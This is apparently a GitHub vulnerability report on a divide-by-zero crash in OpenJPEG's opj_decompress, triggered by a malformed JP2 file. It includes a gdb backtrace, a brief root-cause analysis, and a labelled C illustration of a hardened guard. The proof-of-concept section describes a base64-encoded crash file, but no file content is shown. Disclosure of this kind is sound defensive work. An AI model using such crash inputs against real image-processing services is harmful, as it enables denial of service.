division-by-zero (SIGFPE) error in opj_tcd_init_tile function (line 730 of tcd.c) #733
Description
Testing Environment
Ubuntu + OpenJPEG (GitHub master, 2016/03/28)
Exception Information
username@ubuntu:~/Desktop/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...done.
(gdb) r -o image.pgm -i crashes/001.jp2
Starting program: ~/Desktop/openjpeg/bin/opj_decompress -o image.pgm -i crashes/001.jp2
[INFO] Start to read j2k main header (131).
[INFO] Main header has been correctly decoded.
[INFO] No decoded area parameters, set the decoded area to the whole image
Program received signal SIGFPE, Arithmetic exception.
0xb7fc446d in opj_tcd_init_tile (p_tcd=0x8062850, p_tile_no=0, isEncoder=0,
fraction=0.5, sizeof_block=56, manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/tcd.c:730
730 if ((((OPJ_UINT32)-1) / l_data_size) < (OPJ_UINT32)(l_tilec->y1 - l_tilec->y0)) {
(gdb) p l_data_size
$1 = 0
(gdb) bt
#0 0xb7fc446d in opj_tcd_init_tile (p_tcd=0x8062850, p_tile_no=0, isEncoder=0,
fraction=0.5, sizeof_block=56, manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/tcd.c:730
#1 0xb7fc571b in opj_tcd_init_decode_tile (p_tcd=0x8062850, p_tile_no=0,
p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/tcd.c:1043
#2 0xb7fa80be in opj_j2k_read_tile_header (p_j2k=0x8060298, p_tile_index=0xbfff9e84,
p_data_size=0xbfff9e88, p_tile_x0=0xbfff9e8c,
p_tile_y0=0xbfff9e90, p_tile_x1=0xbfff9e94,
p_tile_y1=0xbfff9e98, p_nb_comps=0xbfff9e9c,
p_go_on=0xbfff9e80, p_stream=0x8060170,
p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:8076
#3 0xb7fac298 in opj_j2k_decode_tiles (p_j2k=0x8060298, p_stream=0x8060170,
p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:9717
#4 0xb7fa661e in opj_j2k_exec (p_j2k=0x8060298, p_procedure_list=0x8062420,
p_stream=0x8060170, p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:7341
#5 0xb7facaf9 in opj_j2k_decode (p_j2k=0x8060298, p_stream=0x8060170,
p_image=0x8062890, p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/j2k.c:9943
#6 0xb7fb1aad in opj_jp2_decode (jp2=0x8060210, p_stream=0x8060170,
p_image=0x8062890, p_manager=0x80601e4)
at ~/Desktop/openjpeg/src/lib/openjp2/jp2.c:1487
#7 0xb7fb6c79 in opj_decode (p_codec=0x80601b8, p_stream=0x8060170, p_image=0x8062890)
at ~/Desktop/openjpeg/src/lib/openjp2/openjpeg.c:412
#8 0x0804c2c0 in main (argc=5, argv=0xbffff124)
at ~/Desktop/openjpeg/src/bin/jp2/opj_decompress.c:1330
Simple Analysis
The value of l_data_size is zero.
The code ((OPJ_UINT32)-1)/l_data_size will cause a divide-by-zero exception (SIGFPE).
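As an added illustration (not code from the OpenJPEG project or from the reporter), the shape of the guard at tcd.c:730 next to a form that rejects a zero operand before it divides; function names and sample operands are constructed for this example:

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Same shape as the guard at tcd.c:730 quoted in the backtrace above:
 * the overflow test itself divides by data_size, so when a malformed file
 * yields l_data_size == 0 the guard traps (SIGFPE) before it can reject
 * anything. Constructed illustration, not the OpenJPEG source. */
static bool tile_size_fits_unguarded(uint32_t data_size, uint32_t height)
{
    /* division by zero when data_size == 0 */
    return ((uint32_t)-1) / data_size >= height;
}

/* Hardened form (added here; not OpenJPEG's own patch): treat a zero
 * operand as malformed input and return before the division, then keep
 * the overflow test. Returns data_size * height, or 0 when the input is
 * rejected (0 can never be a valid result because both operands must be
 * non-zero). */
static uint32_t checked_tile_bytes(uint32_t data_size, uint32_t height)
{
    if (data_size == 0 || height == 0) {
        return 0;                 /* would trap, or is meaningless */
    }
    if (((uint32_t)-1) / data_size < height) {
        return 0;                 /* product does not fit in 32 bits */
    }
    return data_size * height;
}

int main(void)
{
    /* Constructed operands: the crashing file's l_data_size of 0, plus
     * a normal 32-row tile and a product that overflows. */
    printf("data_size=0, height=32   -> %u\n", checked_tile_bytes(0, 32));
    printf("data_size=56, height=32  -> %u\n", checked_tile_bytes(56, 32));
    printf("data_size=65536, h=65536 -> %u\n", checked_tile_bytes(0x10000, 0x10000));
    return 0;
}
```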
Proof-of-Concept file
Decode the following content with base64 and save the decoded bytes to a .jp2 file to obtain the PoC.
Credit
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.